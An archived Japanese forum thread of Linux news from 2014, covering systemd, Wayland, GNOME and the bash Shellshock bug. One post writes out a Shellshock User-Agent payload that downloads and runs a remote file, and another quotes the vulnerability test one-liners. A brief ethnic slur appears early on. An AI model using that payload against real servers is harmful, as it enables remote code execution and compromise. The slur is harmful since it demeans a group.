[過去ログ] Linux板ニュース速報24 (1002レス)
1-
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
1: 2014/09/16(火)14:01 ID:79eC89NW(1/4) AAS
日々世界中で更新される情報を書き込むスレ。
単発ニューススレが立てられた場合もここに誘導よろしく。

前スレ
Linux板ニュース速報23 2chスレ:linux

22 2chスレ:linux
21 2chスレ:linux
20 2chスレ:linux
19 2chスレ:linux
18 2chスレ:linux
17 2chスレ:linux
省16
2: 2014/09/16(火)14:02 ID:79eC89NW(2/4) AAS
■関連リンク
--------------- NEWS ---------------
外部リンク:slashdot.org
外部リンク:slashdot.jp
外部リンク:sourceforge.jp
外部リンク:www.atmarkit.co.jp
外部リンク:ascii.jp
外部リンク:www.ibm.com
外部リンク:japan.cnet.com
外部リンク:itpro.nikkeibp.co.jp
省18
3: 2014/09/16(火)14:02 ID:79eC89NW(3/4) AAS
------------ SOFTWARE -------------
外部リンク:freecode.com
外部リンク:sourceforge.net
外部リンク:sourceforge.jp
外部リンク:news.softpedia.com
4: 2014/09/16(火)14:03 ID:79eC89NW(4/4) AAS
AA省
5(1): 2014/09/19(金)16:53 ID:yQiwowvn(1) AAS
最近朝鮮人多すぎ
6: 2014/09/19(金)17:36 ID:j5N5rUG6(1) AAS
>>5
デル男の事だろ。
7: 2014/09/21(日)14:35 ID:CY1m4C0y(1) AAS
外部リンク:uselessd.darknedgy.net

systemdのforkでuselessdというのが開発されているらしい。
ジョークなのかマジなのかわからん。
8: 2014/09/21(日)17:20 ID:y+758qhj(1) AAS
systemd叩きがよくわからん。systemdになるとなにか不都合でもあるの?
旧来のやり方でsystemdより速く起動できるの?
9: 2014/09/21(日)23:51 ID:DUsydVJF(1) AAS
新しいことを覚えたくない連中が抵抗してるだけじゃね?
10(1): 2014/09/23(火)22:30 ID:hIiwuKTs(1) AAS
Wayland & Weston 1.6 Released
外部リンク[php]:www.phoronix.com
Wayland and Weston 1.6.0 released
外部リンク:lwn.net
11: 2014/09/25(木)12:02 ID:MFJ8tU48(1/2) AAS
【IT】「bash」シェルに重大な脆弱性、開発元がパッチ公開 [14/09/25]
2chスレ:newsplus
12: 2014/09/25(木)12:32 ID:oFBVQjC9(1) AAS
また、仕返しされるのかな、あそこ
13: 2014/09/25(木)13:19 ID:CS9r3+xq(1) AAS
>>10
Waylandってまともに使えるようになったの?
14: 2014/09/25(木)21:41 ID:MFJ8tU48(2/2) AAS
2chスレ:newsplus
[ ニュース速報+ ] 【IT】「bash」シェルに重大な脆弱性、開発元がパッチ公開 [14/09/25]

141 名前:名無しさん@0新周年@転載は禁止 [sage]: 2014/09/25(木) 21:29:17.37 ID:53MnlhMS0
CVE-2014-6271確認用
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
↑を実行して“vulnerable”が表示されたら穴有り
bashが吐くエラーと“echo this is a test”の行だけ表示されるのはおk

CVE-2014-7169確認用
env x='() { (a)=>\' bash -c "echo date"; cat echo
↑を実行して“echo”というファイルが作られ、内容(dateの結果)が表示されたら穴有り
省3
15: 2014/09/26(金)02:17 ID:K9PMWfPq(1) AAS
GNOME 3.14 Officially Released
外部リンク[php]:www.phoronix.com

There's Wayland Changes Needed Before GNOME Will Be 100% Ported
外部リンク[php]:www.phoronix.com
16: 2014/09/26(金)22:33 ID:HrpkMRL0(1/2) AAS
なんで、ポリスが動いたん?
17: 2014/09/26(金)23:31 ID:HrpkMRL0(2/2) AAS
お祭り騒ぎに発展させてどうするんだろ、実行犯?
18(1): 2014/09/27(土)01:11 ID:l1EBJkRU(1) AAS
Shellshock に関するFSFのステートメント

Free Software Foundation statement on the GNU Bash "shellshock" vulnerability ― Free Software Foundation ― working together for free software
外部リンク:www.fsf.org

明日読むつもり
19: 2014/09/27(土)20:52 ID:TVqXwgKo(1) AAS
リナックス使うHP、サイバー攻撃の恐れ 官公庁も利用
外部リンク[html]:www.asahi.com
20(2): 2014/09/27(土)22:32 ID:0XMHxYUv(1/2) AAS
2chとかも大丈夫なの?
User-Agent: (){:;};/usr/bin/env wget -O /tmp/foo 外部リンク:uploader.com && /tmp/foo &
とか入ってるだけでダメなんだろ
21(1): 2014/09/27(土)22:47 ID:hDq5tSSV(1/3) AAS
>>20

>>18にフリーソフトだからセキュ最高って書いてあるでしょ。
フリーで無いソフトは危険だから使わないことを推奨している。
22(1): 2014/09/27(土)22:55 ID:0XMHxYUv(2/2) AAS
>>21
実際もうCVE-2014-7169の修正入ったバージョンが出てるだろ
フリーソフトについて煽りたいなら他所でやれよ
23: 2014/09/27(土)23:11 ID:hDq5tSSV(2/3) AAS
>>22
読め。

前半がフリーソフトが70億人の目で見張られているから安全であるという説明。
後ろ半分がフリーで無いソフトによって起こるセキュリティ被害の問題についてだ。

フリーで無いソフトを使うと預金が勝手に引き出されたり、知らないうちに
借金を抱えていたりするってことだ。
24: 2014/09/27(土)23:16 ID:hDq5tSSV(3/3) AAS
FSFが安全宣言出したんだから安全だろ。

フリーで無いソフトを使うことの危険性を指摘する記事だ。

つまり、FSFはWindowsを使うと危険と言っている。
25(1): 2014/09/28(日)00:15 ID:PFO6+bzl(1) AAS
Heartbleedよりも危険性高い、bash脆弱性「ShellShock」
外部リンク:news.mynavi.jp
26(2): 2014/09/28(日)01:59 ID:bvCTgX/S(1/2) AAS
>フリーソフトが70億人の目で見張られているから安全である
>フリーで無いソフトによって起こるセキュリティ被害の問題

ひっでえFUDだよなコレ

今回たまたまバグハンターが見つけたから明るみになったけど
初期からある脆弱性がずっと見過ごされてきたという現実

オープンソースだろうがほとんどのヤツは使ってるだけだし
少数派のコードいじるヤツも関心のある所しか見ないと今回も証明された
たくさんの目で見張られてるから安全だなんてひどい妄想だよ

LKLMみたいな基地外じみたところは知らんがw
省2
27: 2014/09/28(日)02:03 ID:bvCTgX/S(2/2) AAS
>>26
書き間違えた
LKLMじゃないLKMLだ
28: 2014/09/28(日)08:29 ID:ZwuzI62Z(1) AAS
>>26
どんなソフトもバグがないとは保証出来ない
バグが出た場合すぐ対応出来るか否かの違い
29(1): 2014/09/28(日)08:44 ID:KV/M3NYr(1/3) AAS
外部リンク:www.fsf.org

ここにFSFの声明が書かれているけど、GNUソフトウェアは安全だから心配しなくていいって書いてあるよ。
30(1): 2014/09/28(日)08:55 ID:JI/caqzg(1) AAS
NHKニュースで取り上げられたけど土日は更新しないってポリシーの
所結構あるからなあw

ニュース聞いてた奴が「はいはい、またJavaとかだろ…え? bash!?」
って慌ててパッチ当てたのはいたけど。
31: 2014/09/28(日)08:57 ID:KV/M3NYr(2/3) AAS
>>30
bash使ってるなら安全でしょ。
32: 2014/09/28(日)11:24 ID:c5aid+YK(1) AAS
>>29
要約すると、「最も深刻な問題は直した。
ソースコードが自由に使えないソフトウェアが安全かどうかは、利用者の人にはどうすることもできないけど、
フリーソフトウェアのコードは誰でも使えるように公開しているから、安全かどうかは利用者の皆さんの協力にかかっているよ。」といったようなことが書いてあると思う。
33: 2014/09/28(日)11:29 ID:oxIASyeO(1/3) AAS
やってる人のチェックだけじゃ、どうしても漏れとかかが
大勢の目で見るほうがいろいろ有利な面はありますね
34(1): 2014/09/28(日)11:33 ID:Ulgskj9U(1) AAS
Linuxを使わないことで回避した
35: 2014/09/28(日)11:34 ID:oxIASyeO(2/3) AAS
あれ、linuxだけの問題なの?
36(2): 2014/09/28(日)14:51 ID:o+LWD/c1(1) AAS
Apple曰く、OS Xのユーザのほとんどはbashの悪用に対して安全
外部リンク:jp.techcrunch.com
> ユーザが高度なUNIXサービスを構成していなければbashがリモートで悪用されることはない。

GNU bash脆弱性(ShellShock)、各種OSSプロジェクトが影響範囲を発表
外部リンク:news.mynavi.jp
> FreeBSDにはbashはデフォルトでは入っていない

bashにコードインジェクションの脆弱性「Shellshock」、管理者に大きなショック
外部リンク[html]:www.atmarkit.co.jp
> 一部のLinuxやBSD系OSでは/bin/shがデフォルトでbash以外のシェルとなっている
37: 2014/09/28(日)15:11 ID:KV/M3NYr(3/3) AAS
一部のLinuxは/bin/shがbashじゃないので、Linuxは影響を受けない。
従って、Linuxは安全です。
38: 2014/09/28(日)20:48 ID:EhHBhltM(1) AAS
>>36

macユーザーのほとんどは高度なunixサービスを構成していないってことか…。
あれ、macユーザーappleにバカにされてる?
39: 2014/09/28(日)21:06 ID:0Eul11gq(1) AAS
>>34
小生もWindowsを使わない事で誤認逮捕から回避されてる。
40(1): 2014/09/28(日)22:03 ID:X/hSrfi6(1/2) AAS
影響範囲でかいので重要なのはわかるが、

・外部からシェルスクリプト実行できるようになっている。
(例:CGIでshスクリプト呼び出ししているとか、
 考えにくいが、悪意のある攻撃者の可能性のある人に、
 権限の強いユーザでsshやrsh接続を許可しているなど)

・最新バージョンにアップデートせずに、この脆弱性をつく悪意のあるソフトを実行してしまう。

上記2点がなければ特に問題がないような。
とりあえずアップデートして終わりでしょ。

「https通信がセキュアじゃなかった」っていうheartbleedに比べて危険性が高いとかはないわ。
(heartbleedに比べて、簡単だから問題が危険度が高いと判断したのならしらんけど。)
41(1): 2014/09/28(日)22:19 ID:XJlfZ52T(1) AAS
>>40見たいな鯖管が世界中にいるんだろうな
恐い恐い
42: 2014/09/28(日)23:12 ID:oxIASyeO(3/3) AAS
FUDですか?
怖い
っていえば、素人さんはころっと
43: 2014/09/28(日)23:37 ID:X/hSrfi6(2/2) AAS
>>41
CGIとかでsh呼び出し(shからの呼び出し含む)がなければ
外部からこの脆弱性つく攻撃は難しいでしょ。

上記に該当する鯖をお持ちの方(多くの鯖管)は大変だろうが、
それ以外の人にとっては、Updateして「ハイ終わり」みたいな感じの気ガス。

なんかあるんだっけ?
44: 2014/09/29(月)00:50 ID:33bFcg/s(1/2) AAS
脆弱性をつくようなところとお付き合いしてる
ってことでしょう、不安を煽ってる人たちは
45: 2014/09/29(月)08:06 ID:BgEo+ttp(1) AAS
CGIはHTTPヘッダーがそのまま環境変数に反映されるので、bashで組まれた
スクリプトは即影響が出る。
あとsystem(3)やpopen(3)のようなライブラリコールは/bin/shを呼ぶので、
こいつの実体がbashだとやっぱり影響を受ける。
ということで影響範囲はやっぱりでかいよ。
46: 2014/09/29(月)08:23 ID:cBw8l2/z(1) AAS
ここ数日docomoの広域無線LANに入るのに、
パスワードとID入力がいちいち手入力必須になっていたのも、
脆弱性が解決中だったためか(笑)
47: 2014/09/29(月)08:27 ID:33bFcg/s(2/2) AAS
なんか必死に炎上させようと...
48: 2014/09/29(月)18:58 ID:fPX31z+d(1) AAS
田舎者だからな
49: 2014/09/30(火)06:51 ID:Zl5/o1V1(1) AAS
まあWindowsみたいに誤認逮捕されたら人生終わりだな。
50: デムパゆんゆん@9月月見バーガー 【関電 68.3 %】 [はげ] 2014/09/30(火)22:22 ID:TddB3qI8(1) AAS
大丈夫だ問題ない
linuxは安全だ
51: 2014/09/30(火)22:25 ID:pYZfedbV(1) AAS
レンサバの共有サーバーでssh経由で
52(1): 2014/10/02(木)20:09 ID:vg8Trah7(1) AAS
外部リンク[html]:www.publickey1.jp

> タネンバウム教授「認めよう、私が間違っていた」

Linux大勝利や!!
53: 2014/10/02(木)20:27 ID:WBrR4e4Z(1) AAS
>>52

そのブログのコメント欄でlinuxについて言及してるわけじゃないって書かれてるけど…。
minixがunixのようになろうとしてると言ってるそうだが…。
そう言えばminixもマイクロカーネルなんだね。WindowsNTとどっちが使いやすいんだろう。
54: 2014/10/03(金)07:25 ID:bEbQxmgm(1) AAS
>>36
老害hiwaの自己満クソ訳は相変わらずだな
55: 2014/10/03(金)19:27 ID:rq2YPIvK(1) AAS
ブラウザ栄枯盛衰-- Chrome(クローム)がシェア2割超に、Firefox(ファイアフォックス)は15%弱に後退
外部リンク[html]:news.goo.ne.jp
56(2): 2014/10/05(日)01:54 ID:5SJGvbcE(1) AAS
OpenSSLもそうだけど、Bashの脆弱性は数十年放置されてたわけで、一部のハッカーはこれまでやりたい放題だったんだろうな
57: 2014/10/05(日)02:50 ID:HlSKx/G9(1) AAS
たくさんの目があるから安心して使えるんだよという
オープンソース原理主義者のFUDを否定する事例がまた一つ
58(1): 2014/10/05(日)06:41 ID:4v1IrOuF(1) AAS
>>56
だけど脆弱性の実害が出てるのは家庭用のWindowsマシンが殆どなんだよな。
59: 2014/10/05(日)09:16 ID:qhsnXCWS(1) AAS
>>56
NSA??
60: 2014/10/05(日)10:14 ID:Uh+eq2wo(1) AAS
>>58
Windowsの脆弱性の方が汎用性高い場合が多いからなあ。
bashのなんて前提条件が複数あるから酷い実害が出たのはごく僅か
しか無いだろう。
61(1): 2014/10/06(月)12:39 ID:G4dhdAhy(1/2) AAS
OpenSSLに重大な脆弱性? 1024ビットのRSA暗号が20分で因数分解できるとの怪情報が流れる
外部リンク:appllio.com
62: 2014/10/06(月)12:40 ID:G4dhdAhy(2/2) AAS
Fedora Shellshock対策としてbashからdashへ変更検討
外部リンク:news.mynavi.jp
63: 2014/10/06(月)15:17 ID:Q4aVwKET(1) AAS
有用な情報のなか悪いんだけど
外部リンク[php]:www.phoronix.com
このLinusの存在感
最初ハリポタかと思ったわ
64: 2014/10/06(月)16:28 ID:cRrXVrDr(1) AAS
>>61
そういや数年前にTV特集で素数についてのとある学説がついに解明されるか!?
ってやってて、RSA社も内部に数学者たくさん抱えて研究的な事やってたけど
結局あれから何も聞かないな。
65: 2014/10/07(火)02:11 ID:sCY1Wl/j(1) AAS
表立ってなかっただけで、NSAなんかは何年もLinuxの脆弱性利用していたのかもしれない
何十年も放置されてた脆弱性を今更ながら騒いでるのは滑稽な感じもする
66: 2014/10/07(火)06:34 ID:NZS2Vd7t(1) AAS
利用してるでしょ、そりゃ
騒いでるのは滑稽だけど対処できた事はいい事
67: 2014/10/07(火)08:12 ID:2WWKrGyn(1) AAS
ようやくbashの公式fixが出てバージョンが上がったな

既存のヤツはほとんどが不完全だったから
もう大丈夫と思ってた連中は再度適用しとけよ
68(1): 2014/10/12(日)00:32 ID:Eyog35kD(1/2) AAS
外部リンク:japan.zdnet.com

> 「魚は頭から腐る」--systemdの開発者がトーバルズ氏を公然と批判
>
> 最近では、僕を殺すために殺し屋を雇おうとビットコイン集めが開始されている(本当の話だ!)

systemdの中の人嫌われすぎバロス
69(1): 2014/10/12(日)00:38 ID:Eyog35kD(2/2) AAS
外部リンク:japan.zdnet.com

> 筆者はLinuxのトップ開発者のほとんどを知っているが、
> 誰かを殺したり、憎悪を推奨する人は誰一人としていない。

Hans Reiser...
70: 2014/10/12(日)01:21 ID:kBc3glk6(1) AAS
開発者同士や開発者とユーザーとの間でのトラブルではないからということじゃないか。
夫婦のトラブルだし、開発に関係することじゃないでしょ、あれ。
71: 2014/10/12(日)01:28 ID:779MxIf2(1) AAS
若めのいきのいいのがやってるんだ、やっぱり
72: 2014/10/12(日)18:49 ID:kl9qeiCC(1) AAS
>>69
彼はFSの開発者だから。
73: [Sage] 2014/10/13(月)17:38 ID:ThE5KNK4(1) AAS
$100 off Linux Foundation Certification for Ubuntu Users
外部リンク:discourse.ubuntu.com
74: 2014/10/13(月)19:14 ID:aJoDipBP(1/3) AAS
昔から新聞とかヤクザ稼業だったし
75: 2014/10/13(月)21:00 ID:aJoDipBP(2/3) AAS
>>68
呪物崇拝してみても妨害工作受けるから、
本当に難癖つけてるだけらしい。
76: 2014/10/13(月)22:36 ID:aJoDipBP(3/3) AAS
ささじん
想像してご覧、
77(1): 2014/10/13(月)22:42 ID:fll1miyq(1) AAS
systemd、ユーザースペースのコンソールデーモン「systemd-consoled」を追加
外部リンク:linux.slashdot.jp、ユーザースペースのコンソールデーモン「systemd-consoled」を追加
本家/.「Systemd Adding Its Own Console To Linux Systems」より
systemd 217では、ユーザースペースのコンソールデーモンとしてターミナル環境を提供する「systemd-consoled」の
試験的なバージョンが導入される。
Linuxの開発者らはカーネル内のVTサブシステムをいずれは廃止し、より高度なローカライズやセキュリティ、堅牢性を
提供するユーザースペースのコンソールに置き換えようとしているが、consoledはこれを促進するものとなる。
8月にリリースされたsystemd 216ではユーザースペースVTサブシステムの実装に使用することを目的とした
systemd-terminalライブラリが追加されており、systemd-consoledは最初の試験的な実装となるようだ。
個人的には面白いなとか思うんだけど、ダメなんですか??
78: 2014/10/13(月)23:00 ID:0UaUYNSi(1) AAS
systemd死ね死ね団の暗躍が激しくなりそうだな
79: 2014/10/13(月)23:08 ID:yP4TswnU(1) AAS
敵作る方みたいだけど、結構マメなことやってみたいだからね
つぶされないってことは...認め印?
80(1): 2014/10/14(火)01:40 ID:JeCr4U8s(1) AAS
>>77

新しいターミナルができるよってことで良いの?
似たようなことbsdでもやってるよね。悪くないんじゃない?
81: 2014/10/14(火)03:52 ID:O+SnOqu5(1) AAS
そんなことよりfishだ
82: 2014/10/14(火)06:47 ID:qwdbTnui(1) AAS
>>80
仮想コンソールはカーネルベースだからやめにしてユーザベースに移行しようという話
/dev/consoleを直で叩いていたのをsystemdが受け持つからsystemd-consoledを経由してねという話だと
83: 2014/10/14(火)21:07 ID:3BR9n1u7(1) AAS
GNU SRC Updated: BSD Ports-Like System In The GNU World
外部リンク[php]:www.phoronix.com
へえ、こんなのあるんだ
84: 2014/10/22(水)13:06 ID:eI00ygP1(1) AAS
ほとんど全てがダウンして壊滅しても最後の最後カーネルとVTだけは生き残るのがLinuxの所作
85: 2014/10/22(水)17:15 ID:T6UgPQgy(1) AAS
所作?
86(2): 2014/10/23(木)14:13 ID:p2LdmTl2(1) AAS
[Phoronix] Ubuntu 14.10 Linux 32-bit vs. 64-bit Performance
外部リンク[php]:www.phoronix.com
87: 2014/10/23(木)15:12 ID:yChWL3Kk(1) AAS
いま32bit環境使ってる人はパフォーマンスの問題で32bitを使っているわけ
ではないから、いくらパフォーマンスが上がりますよって言われてもな。
88: 2014/10/23(木)16:34 ID:vyui1mRi(1) AAS
今頃32bitと64bitの比較するアホいるのな
どうせならメモリ1GBとか2GBでベンチやればいいのに
89: 2014/10/23(木)17:57 ID:cMxNyI8A(1) AAS
つかUbuntuは32bit終わっちゃうかもしれんみたい

[Phoronix] Ubuntu 16.04 Might Be The Distribution's Last 32-Bit Release
外部リンク[php]:www.phoronix.com
90: 2014/10/24(金)03:01 ID:R3N+ako4(1) AAS
RHEL7で既に32bitは切られてるしな
もう10年経つしそろそろ32bitは本格的に廃止で
64bitオンリーで32bitの不要な機能を削除したCPUが出てもいい頃合い
91: 2014/10/24(金)07:14 ID:mBUb+PLa(1) AAS
ソフトを誰が対応するのかがネックだと
32ビット版しかないものも結構あると思いますが
92: 2014/10/24(金)09:57 ID:IsMHIeKr(1) AAS
基本的に32のコードも動くから心配ない
現時点でgccとclangのどっちが速いのかの方が一大事よ
伸び悩むgccと順調に性能伸ばしてるclang、逆転するのが時間の問題なのは誰の目にも明らかで
CPUの仮想化=llvm、仮想CPUに終結するコンパイラテクノロジー
93(1): 2014/10/24(金)20:54 ID:X+mNc+oF(1) AAS
いまのx86-64って32bitの上に追加で64bitのやつ乗っけてるんでしょ、32bitの
機能消したら土台が消えちゃうのでは?
今から32bitのぶん消すくらいなら元から64bit専用のitanium使ったほうが良くないか。
94: 2014/10/24(金)21:30 ID:dfDnIpEV(1) AAS
itaniumよりはarm
95: 2014/10/24(金)22:17 ID:bM7nr4/5(1) AAS
>>93
アホは黙っていればいいと思うよ
96: 2014/10/25(土)08:20 ID:u5lJ9sH0(1) AAS
32bitのソフトウェアを打ち切りにするのはわかるが
CPUのx86命令を廃止するメリットって現時点ではほとんどないと思う
97: 2014/10/25(土)09:35 ID:5yRMgOwB(1/2) AAS
そこまでCPUの事を詳しくは知らないで書くけど
x86命令のコードを翻訳してCPU内部で処理してるのを
x64?命令のみにすればCPU内部の処理が最適化されるように思うけど
CPU側の処理を変えないといけないので今までの設計思想を全部捨てないとならないだろうけど
98: 2014/10/25(土)10:30 ID:5yRMgOwB(2/2) AAS
外部リンク:sourceforge.jp
Webブラウザを内蔵した「Emacs 24.4」リリース

なんかウケタ
99: 2014/10/25(土)11:48 ID:/RQPyfWL(1) AAS
Emacsは「環境」だからね
100: 2014/10/25(土)12:40 ID:geHKshlY(1) AAS
どうせ今までもemacs-w3だのemacs-w3mだの使ってたんだろ
1-
あと 902 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.271s*